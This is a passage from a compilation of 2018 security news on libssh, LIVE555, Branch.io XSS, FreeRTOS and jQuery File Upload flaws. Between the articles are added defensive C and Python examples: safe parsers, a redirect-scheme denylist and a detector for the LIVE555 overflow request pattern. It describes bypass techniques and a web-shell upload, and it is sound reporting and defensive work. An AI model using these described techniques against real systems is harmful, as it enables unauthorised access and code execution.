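enum hdr_result look_for_header_bounded(const char *req, size_t req_len,
                                        const char *name, char *out, size_t out_size)
{
    size_t name_len = strlen(name), i = 0;
    int found = 0;

    if (out_size == 0)
        return HDR_TOO_LONG;
    out[0] = '\0';
    while (i < req_len) {
        size_t line_end = i;                    /* locate the end of this line */
        while (line_end < req_len && req[line_end] != '\r' && req[line_end] != '\n')
            line_end++;
        if (line_end - i > name_len && ieq(req + i, name, name_len) &&
            req[i + name_len] == ':') {
            if (found)
                return HDR_DUPLICATE;           /* repeated header: refuse */
            found = 1;
            size_t v = i + name_len + 1;        /* skip ':' and leading blanks */
            while (v < line_end && (req[v] == ' ' || req[v] == '\t'))
                v++;
            size_t vlen = line_end - v;
            if (vlen >= out_size)
                return HDR_TOO_LONG;            /* value would not fit: refuse */
            memcpy(out, req + v, vlen);
            out[vlen] = '\0';
        }
        i = line_end;                           /* step over CR/LF terminators */
        while (i < req_len && (req[i] == '\r' || req[i] == '\n'))
            i++;
    }
    return found ? HDR_FOUND : HDR_ABSENT;
}

/* Constructed sample requests (not captured traffic). */
const char REQ_OK[] = "GET /stream HTTP/1.0\r\n"
                      "x-sessioncookie: abc123\r\n"
                      "Accept: application/x-rtsp-tunnelled\r\n\r\n";
const char REQ_DUP[] = "GET /stream HTTP/1.0\r\n"
                       "x-sessioncookie: abc123\r\n"
                       "x-sessioncookie: zzz999\r\n\r\n";
const char REQ_LONG[] = "GET /stream HTTP/1.0\r\n"
                        "x-sessioncookie: 0123456789abcdef0123456789abcdef\r\n\r\n";

/* Run the lookup over one sample into a 16-byte destination; returns the code. */
int check_sample(const char *req, const char *name)
{
    char value[16];
    return (int)look_for_header_bounded(req, strlen(req), name, value, sizeof value);
}

/* Returns 1 if the cookie in REQ_OK is extracted exactly. */
int sample_cookie_ok(void)
{
    char value[16];
    if (look_for_header_bounded(REQ_OK, strlen(REQ_OK), "x-sessioncookie",
                                value, sizeof value) != HDR_FOUND)
        return 0;
    return strcmp(value, "abc123") == 0;
}

int main(void)
{
    printf("ok=%d dup=%d long=%d absent=%d cookie=%d\n",
           check_sample(REQ_OK, "x-sessioncookie"), check_sample(REQ_DUP, "x-sessioncookie"),
           check_sample(REQ_LONG, "x-sessioncookie"), check_sample(REQ_OK, "Range"),
           sample_cookie_ok());
    return 0;
}
```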

Cisco, F5 Networks Investigate libssh Vulnerability Impact
23.10.2018 securityweek

Cisco and F5 Networks are investigating the possible impact of the recently patched libssh vulnerability on their products, while other vendors have concluded similar investigations.

The bug, discovered by Peter Winter-Smith, security consultant at NCC Group, could allow an attacker to authenticate on a server without credentials. Specifically, the attacker could send the server a message that tricks it into believing authentication has been successful, even if the authentication process never started.

The flaw was reported to libssh developers on June 25 and impacts versions 0.6 and later of the library. Tracked as CVE-2018-10933, the vulnerability was addressed with the release of libssh 0.8.4 and 0.7.6 last week.

There are thousands of servers using libssh to implement the Secure Shell (SSH) remote login protocol (many operated by Verizon Wireless and Sprint PCS), but not all of them might be impacted, Winter-Smith suggested. Only libssh operating in server mode, not the usual client mode, appears to be affected.

GitHub, which uses the library, said last week it wasn’t impacted, although it did apply the provided patch. OpenSSH, libssh2, curl, and libcurl aren’t affected either.

Within days after the flaw was made public, vendors have started to investigate the impact on their products, and some even confirmed they are affected.

For the past several days, Cisco has been trying to determine which of the products that use the library are affected. The company has published a list of possibly impacted applications, but has yet to confirm the vulnerability in any of them.

F5 Networks too has been looking into its product line, and discovered that BIG-IP application delivery controllers are exposed (only BIG-IP AFM SSH virtual servers that use key-based authentication are vulnerable). Other products are either not impacted or haven’t yet been confirmed to be affected.

Red Hat Enterprise Linux 7 Extras has been confirmed vulnerable, the same as Debian (fixed in version 0.7.3-2+deb9u1), Ubuntu (18.04 LTS, 16.04 LTS, 14.04 LTS, and derivatives), and SUSE Linux Enterprise 12 and 15.

Teamspeak uses libssh, but not in a way that is susceptible to the vulnerability. Alert Logic says it isn’t impacted by the bug and that the Alert Logic appliance is not vulnerable. Netgate’s pfSense isn’t affected, and neither is Centrify DirectControl. Cyber exposure company Tenable has also assessed the weakness and determined that its products are not impacted.

In addition to exploit code for the vulnerability being published online, tools that can be used to identify this vulnerability have been released too.

The “likelihood of exploitation in the wild is low,” the co-founder and director of Hacker House suggests.
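The following C model, added here and not libssh's code, shows the server-side rule the bug described above violates: USERAUTH_SUCCESS and USERAUTH_FAILURE are server-to-client messages, so a server must never change its own authentication state because one arrived from the peer. The message numbers are the standard ones from RFC 4252/4253; the session structure, `credentials_valid` stand-in and scenario functions are constructed for the example.

```c
#include <stdint.h>
#include <string.h>

/* SSH message numbers (RFC 4253 / RFC 4252) used in this model. */
enum {
    SSH_MSG_SERVICE_REQUEST  = 5,
    SSH_MSG_USERAUTH_REQUEST = 50,
    SSH_MSG_USERAUTH_FAILURE = 51,
    SSH_MSG_USERAUTH_SUCCESS = 52
};

/* Server-side authentication state for one connection. */
enum auth_state { AUTH_NONE = 0, AUTH_IN_PROGRESS = 1, AUTH_DONE = 2 };

struct session {
    enum auth_state state;
    int disconnected;     /* set when the peer violates the protocol */
};

/* Stand-in credential check (constructed); a real server verifies keys or
 * passwords against its configured authentication backend. */
static int credentials_valid(const char *user, const char *secret)
{
    return strcmp(user, "alice") == 0 && strcmp(secret, "correct-horse") == 0;
}

/* Dispatch one message received by the server. USERAUTH_SUCCESS and
 * USERAUTH_FAILURE are server-to-client messages, so the server must never act
 * on them when they arrive from the peer: only a USERAUTH_REQUEST that passes
 * the credential check may move the state to AUTH_DONE. Returns the state after
 * handling the message. */
enum auth_state server_handle(struct session *s, uint8_t type,
                              const char *user, const char *secret)
{
    if (s->disconnected)
        return s->state;
    switch (type) {
    case SSH_MSG_SERVICE_REQUEST:
        if (s->state == AUTH_NONE)
            s->state = AUTH_IN_PROGRESS;
        break;
    case SSH_MSG_USERAUTH_REQUEST:
        if (s->state == AUTH_IN_PROGRESS && credentials_valid(user, secret))
            s->state = AUTH_DONE;               /* the only path to authenticated */
        break;
    case SSH_MSG_USERAUTH_SUCCESS:
    case SSH_MSG_USERAUTH_FAILURE:
        s->disconnected = 1;                    /* client sent a server-only message */
        break;
    default:
        break;                                  /* anything else is ignored pre-auth */
    }
    return s->state;
}

/* Scenario: the client itself sends USERAUTH_SUCCESS. Returns 1 only if that
 * left the session authenticated, which it must not. */
int forged_success_authenticates(void)
{
    struct session s = { AUTH_NONE, 0 };
    server_handle(&s, SSH_MSG_SERVICE_REQUEST, "", "");
    return server_handle(&s, SSH_MSG_USERAUTH_SUCCESS, "", "") == AUTH_DONE;
}

/* Scenario: the forged message terminates the session. */
int forged_success_disconnects(void)
{
    struct session s = { AUTH_NONE, 0 };
    server_handle(&s, SSH_MSG_USERAUTH_SUCCESS, "", "");
    return s.disconnected;
}

/* Scenario: a genuine request with correct credentials authenticates. */
int valid_login_authenticates(void)
{
    struct session s = { AUTH_NONE, 0 };
    server_handle(&s, SSH_MSG_SERVICE_REQUEST, "", "");
    return server_handle(&s, SSH_MSG_USERAUTH_REQUEST, "alice", "correct-horse") == AUTH_DONE;
}

/* Scenario: wrong credentials leave the session unauthenticated. */
int wrong_password_authenticates(void)
{
    struct session s = { AUTH_NONE, 0 };
    server_handle(&s, SSH_MSG_SERVICE_REQUEST, "", "");
    return server_handle(&s, SSH_MSG_USERAUTH_REQUEST, "alice", "wrong") == AUTH_DONE;
}
```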

The fix for the DOM-based XSS in Branch.io introduced a new XSS flaw
23.10.2018 securityaffairs

The security patch for the recently disclosed cross-site scripting (XSS) vulnerability in Branch.io has introduced another similar XSS vulnerability.

According to the security researcher Linus Särud, the security fix for the recently disclosed cross-site scripting (XSS) vulnerability in Branch.io has introduced another similar XSS vulnerability.

The Branch.io company provides the leading mobile linking platform, with solutions that unify user experience and measurement across different devices, platforms, and channels.

The service is used by many popular web services, including Tinder, imgur, Shopify, and Yelp.

The flaw was disclosed a few days ago by the researchers at vpnMentor, who explained that an attacker could have exploited it to access Tinder users’ profiles.

“After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.” reads the analysis published by vpnMentor.

“We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.”

Now Särud has discovered that, even after the deployment of the security patch, it is possible to exploit a new XSS flaw using the payload for a flaw he discovered several months ago and that had been previously fixed.

“Almost a year ago, I started to look into the assets belonging to a company that is running a public bug bounty program. One way of approaching a target is to look for plain HTML files hosted on a site that is not normally built that way. This type of file often contains DOM-XSS vulnerabilities,” reads the analysis of the expert.

“The purpose of the page seems to be to redirect to a mobile app. It takes the redirect-parameter, checks the protocol against a blacklist and if not found redirects to it.”

The researcher discovered the initial vulnerability on a page apparently designed to redirect to a mobile app; the page checks the protocol of the redirect parameter against a blacklist and, if it is not found there, redirects to it.

“To exploit this we need to create a link that will execute as Javascript while the protocol of it is not ‘javascript’. As far as I know this should not be possible according to browser specifications,” continues Särud.


The expert discovered that it is possible to bypass the blacklist using an empty protocol; he then devised a working exploit for Safari and reported the issue to the most popular websites that used Branch.io.

The expert reported the issue to Branch.io, referenced in the report as a “SaaS vendor,” but the company addressed it only with a temporary fix.

After the publication of the security advisory from vpnMentor, Särud noticed that the temporary fix was replaced with a permanent one that introduced the new XSS-vulnerabilities.

“Fast forward some months, and I received a link to vpnMentor’s write-up which shows that the temporary fix had been replaced with a more permanent one. However that in turn resulted in new XSS-vulnerabilities, this time found by vpnMentor.” Särud explained.

“What makes everything interesting is that the initial payload still worked, even after the vulnerabilities found by vpnMentor had been resolved. The fix for the second vulnerability was still vulnerable to a third vulnerability, using the very same payload as in the first report.”

The newly introduced flaw is no longer pure DOM-based XSS; the parameters are now reflected server side, but the researcher confirmed that the attack works more or less in the same way.

“The solution of fixing the third vulnerability was now to add ‘ ‘ and ‘:’ to the blacklist,” Särud said.

“It is most likely this function needs to support a lot of different custom app protocols, making it more or less impossible to use a whitelist instead of a blacklist, an approach that otherwise would have been strongly recommended.”

The expert concluded that, even though Apple was notified of the protocol bug when it was first discovered, the attack still works in the latest version of Safari for macOS and iOS.
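As an added example serving both write-ups of this flaw above (not Branch.io's code), the C functions below put a server-side check modelled on the blacklist approach described beside a strict one: the strict check requires a well-formed RFC 3986 scheme followed by ':', and rejects targets with no explicit scheme or with blanks or control characters anywhere, which is the class of input the reported fixes kept adding to the blacklist. Function names and the denylist contents are constructed for the example.

```c
#include <ctype.h>
#include <string.h>

/* Outcome of validating a redirect target before it is handed to the browser. */
enum redirect_verdict { REDIRECT_ALLOW = 0, REDIRECT_REJECT = 1 };

/* Schemes a redirect must never use. Constructed list for the example. */
static const char *const DENIED_SCHEMES[] = { "javascript", "data", "vbscript", NULL };

/* Case-insensitive equality of s[0..n) with the lowercase NUL-terminated word w. */
static int scheme_is(const char *s, size_t n, const char *w)
{
    if (strlen(w) != n)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != (unsigned char)w[i])
            return 0;
    return 1;
}

static int scheme_denied(const char *s, size_t n)
{
    for (const char *const *d = DENIED_SCHEMES; *d; d++)
        if (scheme_is(s, n, *d))
            return 1;
    return 0;
}

/* Naive check modelled on the behaviour described in the write-ups: treat the
 * text before the first ':' as the protocol and compare it with the denylist.
 * A target with no protocol at all (nothing before the colon, or no colon) is
 * waved through, because no list entry matches an empty string. */
enum redirect_verdict naive_denylist_check(const char *target)
{
    const char *colon = strchr(target, ':');
    size_t n = colon ? (size_t)(colon - target) : strlen(target);
    return scheme_denied(target, n) ? REDIRECT_REJECT : REDIRECT_ALLOW;
}

/* Strict check: the target must start with a syntactically valid RFC 3986
 * scheme (ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )) followed by ':', the
 * scheme must not be denied, and the remainder must contain no whitespace or
 * control characters. Anything that fails to parse is rejected rather than
 * left for the browser to interpret. */
enum redirect_verdict strict_scheme_check(const char *target)
{
    size_t i;
    if (!isalpha((unsigned char)target[0]))
        return REDIRECT_REJECT;                 /* empty or malformed scheme */
    for (i = 1; target[i] != '\0' && target[i] != ':'; i++) {
        unsigned char c = (unsigned char)target[i];
        if (!isalnum(c) && c != '+' && c != '-' && c != '.')
            return REDIRECT_REJECT;
    }
    if (target[i] != ':')
        return REDIRECT_REJECT;                 /* no explicit scheme at all */
    if (scheme_denied(target, i))
        return REDIRECT_REJECT;
    for (const char *p = target + i + 1; *p; p++)
        if (isspace((unsigned char)*p) || iscntrl((unsigned char)*p))
            return REDIRECT_REJECT;
    return REDIRECT_ALLOW;
}
```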

Saudi Future Investment Initiative website defaced by the hackers
23.10.2018 securityaffairs Hacking

Hackers defaced the website of the Future Investment Initiative (FII), a Saudi investment summit, just a day before the three-day conference begins.

An unknown group of hackers has defaced the website of the Future Investment Initiative (FII), a Saudi investment summit, just a day before the three-day conference begins.

Future Investment Initiative defaced

Below is the tweet from Nahayat Tizhoosh (@NahayatT), a producer with CBC News Network.

Nahayat Tizhoosh
'Davos in the Desert' site has been hacked @FIIKSA #Khashoggi

4:12 PM - Oct 22, 2018

Through the defaced homepage, the hackers also leaked the names and phone numbers of several Saudi individuals, including government employees and employees of state-backed companies.

No one has claimed responsibility for the defacement of the website of the event, also known as “Davos in the desert.”

The murder of journalist Jamal Khashoggi caused a string of cancellations from global business giants; executives from bankers JP Morgan to carmaker Ford and ride-hailing app Uber will not attend the event.

The attackers are clearly politically motivated: they defaced the website with messages against Saudi Arabia and the kingdom’s role in the war in Yemen, and they also accuse the government of financing terrorism.

Once the defacement was discovered, the organizers of the Future Investment Initiative took the website down.

“Organisers of FII did not respond to requests for comment. Local media, including the pro-government Okaz newspaper, said the website had come under an ‘electronic attack’,” AFP reported.

The forum aimed to create new billion-dollar opportunities for organizations in the kingdom, but the murder of Khashoggi inside the kingdom’s consulate in Istanbul evidently triggered a long string of cancellations.

Cyberbit Launches Portable ICS Security Assessment Solution
23.10.2018 securityweek

Cyberbit SCADAScan

ATLANTA — SECURITYWEEK 2018 ICS CYBER SECURITY CONFERENCE — Israel-based Cyberbit on Monday announced the launch of SCADAScan, a portable solution designed to help organizations assess the security of their industrial control networks.

A subsidiary of Elbit Systems, Cyberbit offers cybersecurity simulation solutions, along with a platform for detecting and responding to incidents across IT and OT networks. The company recently raised $30 million.

The firm’s latest product, SCADAScan, uses deep packet inspection (DPI) to monitor traffic passing through the ICS/SCADA network and provides a map of assets, as well as information on vulnerabilities and other potential threats. SCADAScan is immediately available.

SCADAScan, a device that users can plug into a network switch for passive monitoring, is housed in a wheeled suitcase, which provides increased mobility. The suitcase is water resistant, weighs 12.5 kg (27 lbs), and can be taken on an airplane as a carry-on.

Cyberbit says the solution can be used by intervention teams, consultants and service providers for on-demand OT security assessments. Critical infrastructure organizations that don’t want to permanently integrate a full-scale monitoring solution into their network can use it to perform periodical scans, minimizing integration and deployment efforts, and providing instant scanning and assessment.

Organizations with larger, distributed networks can use SCADAScan to conduct scans at each of their locations. Cyberbit recommends running a scan for at least 48 hours, but the company says useful data can also be obtained after 2 hours.

SCADAScan is powered by Cyberbit’s SCADAShield solution, which provides monitoring, detection, forensics, visibility, and policy enforcement capabilities for ICS networks. The new product can also be integrated with the company’s Security Orchestration, Automation and Response (SOAR) solution.

Cyberbit SCADAShield

As for hardware, SCADAScan is powered by a Lenovo ThinkPad P51 laptop and an IPC3 Blackbox industrial PC. It also includes diodes that ensure the solution is only listening and no data is sent out to the analyzed networks – the networks are in many cases sensitive and sending out data could cause disruptions.

The SCADAShield software receives two major updates every year and multiple minor updates. These updates can be deployed to SCADAScan via USB or simply by connecting the laptop to the network via Ethernet.

In an interview with SecurityWeek, Edy Almer, VP of Products at Cyberbit, explained that for some organizations it’s important that no data leaves the premises, which is why SCADAScan comes with a clean-up procedure that removes all potentially sensitive data.

Google Boosts Android Security with Protected Confirmation
23.10.2018 securityweek

Google further improved the security of Android with the inclusion of a new API in the latest operating system release.

Called Protected Confirmation, the API takes advantage of a hardware-protected user interface (Trusted UI) to perform critical transactions. When an application uses the API, the user is presented with a prompt asking them to confirm the transaction.

After user confirmation is received, the information is cryptographically authenticated, meaning that Protected Confirmation can better secure the transaction. The Trusted UI, which is in control, keeps the data safe from fraudulent apps or a compromised operating system.

The API, Google says, can also be used to boost the security of other forms of secondary authentication, such as a one-time password or a transaction authentication number (TAN), mechanisms that fail to provide protection if the device has been compromised.

With Protected Confirmation, the confirmation message is digitally signed but, because the signing key only resides in the Trusted UI’s hardware sandbox, it is not possible for malicious apps or compromised operating systems to trick the user into authorizing anything. The signing keys are created using the AndroidKeyStore API.

“Before it can start using Android Protected Confirmation for end-to-end secure transactions, the app must enroll the public KeyStore key and its Keystore Attestation certificate with the remote relying party. The attestation certificate certifies that the key can only be used to sign Protected Confirmations,” Janis Danisevskis, Information Security Engineer, Android Security, explains.

Android Protected Confirmation, Danisevskis says, makes many other use cases possible as well, such as person-to-person money transfers (e.g. Royal Bank of Canada), authentication (e.g. Duo Security, Nok Nok Labs, and ProxToMe), and medical device control (e.g. Insulet Corporation and Bigfoot Biomedical).

Insulet, a manufacturer of tubeless patch insulin pumps, has already shown how it can modify an insulin management system to leverage Protected Confirmation to confirm the amount of insulin to be injected. This should improve quality of life and reduce cost, given that a person with diabetes would be able to use their smartphone instead of a secondary device for control.

“We've been working with FDA as part of DTMoSt, an industry-wide consortium, to define a standard for phones to safely control medical devices, such as insulin pumps. A technology like Protected Confirmation plays an important role in gaining higher assurance of user intent and medical safety,” Danisevskis continues.

An optional feature in Android, Protected Confirmation has low-level hardware dependencies. Google Pixel 3 and 3XL are the first smartphones to support the API, but the feature may not be integrated into devices from other manufacturers.

NATO military command center should be fully operational in 2023
23.10.2018 securityweek

The NATO military command center should be fully operational in 2023, and every member state will contribute its cyber capabilities to the military hub.
The new NATO military command center should be fully operational in 2023. Its tasks will include the defense of member states’ critical infrastructure and the ability to carry out cyber attacks under rules of engagement still to be defined.

The NATO alliance is aware of the growing threats in cyberspace, and the new NATO military command center aims to respond to them.

Each member of the alliance will contribute to the offensive cyber capabilities of the new military hub.

“While NATO does not have its own cyber weapons, the U.S.-led alliance established an operations center on Aug. 31 at its military hub in Belgium. The United States, Britain, Estonia and other allies have since offered their cyber capabilities,” Reuters reported.

“This is an emerging domain and the threat is growing,” said Major General Wolfgang Renner, a German air force commander who oversees the new cyber operations center, or CYOC, in Mons.

“We have to be prepared, to be able to execute operations in cyberspace. We have already gone beyond protection and prevention,” he told Reuters during a NATO cyber conference.

A team of 70 cyber experts will be the pillar of the new NATO military command center that will gather and share information on various threat actors, including cybercrime syndicates, nation-state attackers, terrorists, and hacktivists.

According to the NATO Communication and Information Agency, NATO’s communication and computer networks face hundreds of major attacks every month; China, North Korea, and Russia continuously target the alliance’s infrastructure for cyber espionage purposes.

Recent cyber espionage campaigns attributed to Russia have raised the debate inside the alliance about an urgent response to the aggressive cyber strategy of the Kremlin.

The European Union earlier last week discussed various responses to the attackers, including economic sanctions on the countries that mounted the cyber attacks.

“Our ultimate aim is to be completely aware of our cyberspace, to understand minute-by-minute the state of our networks so that commanders can rely on them,” said Ian West, chief of cyber security at the NATO communication agency.

Recall that NATO has recognized cyberspace as the fifth domain of warfare, so the alliance could respond with conventional weapons to a powerful cyber attack.

NATO has warned that in the future any cyber attack against a member state could trigger a military response under the alliance’s Article 5 mutual defence clause.

“Our concept of operations, a toolbox for short-notice decisions about how to respond, is not in place yet. This is one of the challenges we face,” Renner said.

“If NATO can agree cyber warfare principles, the alliance hopes to integrate individual nations’ cyber capabilities into alliance operations, coordinated through the Mons cyber operations center and under the command of NATO’s top general, the Supreme Allied Commander Europe, or SACEUR,” Reuters continues.

“That could allow the top general to take quick decisions on whether to use cyber weapons, similar to existing agreements for NATO’s air defenses and its ballistic missile shield, where a commander has only minutes to decide what action to take.”

MPlayer and VLC media player affected by critical flaw CVE-2018-4013
23.10.2018 securityweek

Cisco Talos expert discovered a code execution vulnerability (CVE-2018-4013) that has been identified in Live Networks LIVE555 streaming media RTSPServer.
Lilith Wyatt, a security researcher at Cisco Talos, has discovered a critical remote code execution vulnerability (CVE-2018-4013) in the LIVE555 media streaming library that is used by popular media players, including VLC and MPlayer.

LIVE555 Streaming Media is a set of open-source C++ libraries maintained by Live Networks Inc. for multimedia streaming; it supports open standards such as RTP/RTCP and RTSP.
LIVE555 Streaming Media is able to process video RTP payload formats such as H.264, H.265, MPEG, VP8, and DV, and audio RTP payload formats such as MPEG, AAC, AMR, AC-3 and Vorbis.
An attacker can exploit the vulnerability by sending a specially crafted packet containing multiple “Accept:” or “x-sessioncookie” strings that triggers a stack-based buffer overflow, resulting in code execution.
The vulnerability affects the HTTP packet parsing functionality that analyzes HTTP headers for RTSP tunneling over HTTP.

“An exploitable code execution vulnerability exists in the HTTP packet-parsing functionality of the LIVE555 RTSP server library. A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this vulnerability.” reads the advisory published by Talos.
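As an added example (not code from Talos, Live Networks or the Snort rules mentioned below), the following Python checker illustrates the request pattern the advisory describes from a detection standpoint: it parses an RTSP-over-HTTP request, counts how often the watched headers occur and how many bytes they carry, and flags a request that exceeds a threshold. The thresholds, sample requests and header values are assumptions constructed for this example.

```python
"""Added example, not code from Talos, Live Networks or the Snort rules:
a heuristic checker for the RTSP-over-HTTP request pattern described in
CVE-2018-4013 (repeated "Accept:" / "x-sessioncookie" headers).
Thresholds and sample requests are assumptions constructed for this example."""

WATCHED_HEADERS = ("accept", "x-sessioncookie")
MAX_OCCURRENCES = 1       # assumption: a normal tunnel request sends each header once
MAX_HEADER_BYTES = 1024   # assumption: generous bound on the bytes a header may carry


def parse_request_headers(raw: bytes):
    """Split a raw HTTP/RTSP request into (request_line, [(name, value), ...]).

    Duplicate headers are kept as separate pairs so that repetition stays
    visible; names are lower-cased; parsing stops at the first blank line.
    """
    text = raw.decode("latin-1")            # never fails, keeps byte values intact
    head, _, _body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line = lines[0] if lines else ""
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue                        # continuation or junk line: ignore
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def watched_header_stats(headers):
    """Count occurrences and accumulated value length of the watched headers."""
    counts = {name: 0 for name in WATCHED_HEADERS}
    sizes = {name: 0 for name in WATCHED_HEADERS}
    for name, value in headers:
        if name in counts:
            counts[name] += 1
            sizes[name] += len(value)
    return counts, sizes


def is_suspicious(raw: bytes):
    """Return (flagged, reason) for one raw request."""
    _request_line, headers = parse_request_headers(raw)
    counts, sizes = watched_header_stats(headers)
    for name in WATCHED_HEADERS:
        if counts[name] > MAX_OCCURRENCES:
            return True, f"{name} repeated {counts[name]} times"
        if sizes[name] > MAX_HEADER_BYTES:
            return True, f"{name} carries {sizes[name]} header bytes"
    return False, "ok"


# Constructed sample requests (the tunnel header values are illustrative).
BENIGN_REQUEST = (
    b"GET /stream HTTP/1.0\r\n"
    b"Accept: application/x-rtsp-tunnelled\r\n"
    b"x-sessioncookie: abc123\r\n"
    b"\r\n"
)
REPEATED_REQUEST = (
    b"GET /stream HTTP/1.0\r\n"
    + b"Accept: application/x-rtsp-tunnelled\r\n" * 20
    + b"x-sessioncookie: abc123\r\n\r\n"
)
OVERSIZED_REQUEST = (
    b"GET /stream HTTP/1.0\r\n"
    b"x-sessioncookie: " + b"A" * 4096 + b"\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST),
                       ("repeated", REPEATED_REQUEST),
                       ("oversized", OVERSIZED_REQUEST)):
        print(label, is_suspicious(req))
```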

The CVE-2018-4013 flaw potentially exposes millions of users of media players to cyber attacks.

The flaw affects Live Networks LIVE555 Media Server version 0.92 and likely earlier versions of the product; a security update has already been issued to address the vulnerability.

Users of vulnerable media players are recommended to update their installs to the latest version.

Experts released the following Snort rules to detect attempts to exploit this vulnerability:

SIDs 48067 and 48068

Israel Defense Forces were searching systems to spy on private social media messages
23.10.2018 securityaffairs

The Israel Defense Forces solicited bids for spying systems that would allow monitoring of the private messages of social media users.
Monitoring social media platforms is a crucial activity for intelligence agencies; almost every government is working to gather intelligence through such systems.

According to Haaretz, the Israel Defense Forces solicited bids for spying systems that would allow monitoring of the private messages of social media users.

“The Israel Defense Forces asked cybersecurity companies in 2016 to present proposals for creating a system that would monitor social media users’ personal correspondence,” Haaretz states.

The newspaper obtained a document showing that in 2016 the Israel Defense Forces asked cybersecurity companies to propose solutions for spying on social network users.

Haaretz revealed that the Israeli Defence Forces want to use the system to trace and monitor the activity of social media users, including all information posted or exchanged through the most popular platforms, including Facebook, Twitter, Instagram and YouTube.

The monitoring system would also monitor posts and information exchanged in several languages, including Hebrew, Arabic and English.

“The system in question would have to scan and store both private and public information from users of Facebook, Twitter, Instagram, Google Plus, YouTube and so on.” continues the newspaper.

“It does not specify who would be monitored; whether Jewish citizens of Israel or Palestinian residents of Jerusalem – who for the most part do not hold Israeli citizenship – would be targeted; or whether any restrictions set by any outside entity would be imposed on the surveillance activities.”

The surveillance system has to allow government operators to spy on users by searching for targeted keywords, such as terror, resistance, nationality and religion.

Of course, the IDF declared that the document obtained by Haaretz was a draft of an invitation to submit bids that did not come to fruition.

The IDF added that the bidding process was not carried out, for both operational and technological reasons.

FreeRTOS flaws expose millions of IoT devices to cyber attacks
23.10.2018 securityaffairs

Researchers found that FreeRTOS, one of the most popular real-time operating systems for the Internet of Things, is affected by serious vulnerabilities.
Researchers at Zimperium’s zLabs team have found that FreeRTOS, one of the most popular real-time operating systems for the Internet of Things, is affected by serious vulnerabilities.

The researcher Ori Karliner and his team analyzed some of the most popular operating systems in the IoT market, including the FreeRTOS. FreeRTOS is an open-source operating system that runs on most of the small microprocessors and microcontrollers in IoT devices.

Karliner discovered 13 vulnerabilities in FreeRTOS that could be exploited by an attacker to conduct several malicious activities, including remote code execution, information leak and DoS attacks.


The OS supports more than 40 hardware architectures and is used in a broad range of products, including appliances, sensors, electricity meters, fitness trackers, industrial automation systems, cars, and other microcontroller-based devices.

The vulnerabilities reside in the implementation of the TCP/IP stack and affect a FreeRTOS branch maintained by Amazon and the OpenRTOS and SafeRTOS maintained by WITTENSTEIN high integrity systems (WHIS).

The flaws affect the FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), AWS FreeRTOS up to V1.3.1, OpenRTOS and SafeRTOS (With WHIS Connect middleware TCP/IP components).

Amazon has been notified of the situation and the company responded by releasing patches to mitigate the problems.

“During our research, we discovered multiple vulnerabilities within FreeRTOS’s TCP/IP stack and in the AWS secure connectivity modules. The same vulnerabilities are present in WHIS Connect TCP/IP component for OpenRTOS\SafeRTOS.” reads the analysis published by Zimperium.

“These vulnerabilities allow an attacker to crash the device, leak information from the device’s memory, and remotely execute code on it, thus completely compromising it.”

Zimperium will wait for 30 days before releasing technical details about its findings, to allow smaller vendors to patch the vulnerabilities.

Below is the full list of the vulnerabilities discovered by the experts.

CVE-2018-16522 Remote Code Execution
CVE-2018-16525 Remote Code Execution
CVE-2018-16526 Remote Code Execution
CVE-2018-16528 Remote Code Execution
CVE-2018-16523 Denial of Service
CVE-2018-16524 Information Leak
CVE-2018-16527 Information Leak
CVE-2018-16599 Information Leak
CVE-2018-16600 Information Leak
CVE-2018-16601 Information Leak
CVE-2018-16602 Information Leak
CVE-2018-16603 Information Leak
CVE-2018-16598 Other

City Pays $2,000 in Computer Ransomware Attack
22.10.2018 securityweek

A Connecticut city has paid $2,000 to restore access to its computer system after a ransomware attack.

West Haven officials said Thursday they paid the money to anonymous attackers through the digital currency bitcoin to unlock 23 servers and restore access to city data.

The attack disabled servers early Tuesday morning, and city officials say it was contained by 5:30 p.m. Wednesday.

City attorney Lee Tiernan says officials initially didn't want to pay the ransom, but research showed it was the best course of action.

The city says there's no reason to believe data was compromised. Employee pay was not affected.

The U.S. Department of Homeland Security says the attack came from outside the U.S.

An investigation is ongoing.

0-Day in jQuery Plugin Impacts Thousands of Applications
22.10.2018 securityweek

Thousands of projects are possibly impacted by a jQuery File Upload plugin vulnerability that has been actively exploited in the wild, a security researcher has discovered.

Tracked as CVE-2018-9206, the security bug impacts older versions of the plugin as well, going all the way back to 2010, Akamai researcher Larry Cashdollar found out. At the moment, there are over 7,800 forks of the plugin, and their vast majority carry the original vulnerability.

jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.” The plugin works with a broad range of server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

While analyzing the package’s source, Cashdollar discovered two PHP files named upload.php and UploadHandler.php, which contained the file upload code. Files were saved to the files/ directory in the web server's root path, and the researcher was able to leverage this to upload a web shell and run commands on the server.

“A browser connection to the test web server with cmd=id returned the user id of the web server's running process,” the researcher notes.

Any project that uses the plugin’s code — and possibly code derived from it — is vulnerable and there are even YouTube videos available on how the bug can be exploited in similar software packages.

“This package has been included in various other packages and this code included in the projects web accessible path. It's actively being exploited in the wild,” the researcher told the plugin author.

Apparently, the issue was caused by Apache disabling support for .htaccess in version 2.3.9. While the move was meant to improve performance and to prevent users from overriding security features that were configured on the server, it also left some developers and their projects open to attacks.

The jQuery File Upload PHP implementation, which relied on the .htaccess file for security, was affected too. The bug was addressed in the plugin by only allowing file uploads to be of a content-type image.

However, all projects relying on the jQuery File Upload code would be vulnerable, even if the fork authors changed the original code to suit their own project. These range from stand-alone web applications to WordPress plugins and other content management systems.

“I've done some testing against the 1000 forks of the original code and it seems only 36 were not vulnerable. I found these only required a slight tweak to my exploit to get the majority of them working,” Cashdollar, who also published proof-of-concept (PoC) code, explains.

